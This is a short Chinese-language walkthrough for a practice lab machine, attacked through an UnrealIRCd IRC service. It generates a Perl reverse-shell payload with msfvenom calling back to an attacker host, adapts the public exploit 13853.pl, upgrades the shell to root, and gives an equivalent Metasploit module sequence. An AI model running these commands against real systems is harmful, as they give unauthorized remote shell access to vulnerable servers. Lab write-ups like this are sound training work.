这台靶机主要是irc渗透
irc介绍 https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands#USERIP
-
IRC是Internet Relay Chat的英文缩写,中文称为互联网中继聊天,是一种网络聊天协议。
-
端口号默认的是6667号端口
-
IRC的工作原理非常简单,您只要在自己的PC上运行客户端软件,然后通过因特网以IRC协议连接到一台IRC服务器上即可
常规namp扫描
知道了版本,让我们查一下
第一和第三个都挺感兴趣的,让我们试试远程下载
用msfvenom -p cmd/unix/reverse_perl LHOST=<attacker_IP> LPORT=4000 -f raw 生成一个perl的木马
下面就是如何利用了,先打开13853.pl
在第一个payload里面输入生成的payload,其它的原来的payload全删掉,记得-e后面记得加\,;后面加个\,不然你会反弹失败
现在运行改文件
perl 13853.pl <受害者的 IP> 6667 1
运行有效负载 1
python -c 'import pty;pty.spawn(“/bin/bash”)'
root的密码是root(以后我就记得先试试rootroot弱密码)
上面的irc还可以使用msfsole
msfconsole
msf6 → search unrealircd
msf6 → use 0
msf6 → show options
msf6 → set rhosts 192.168.172.120
msf6 → set payload 7
msf6 → set lhost 192.168.45.239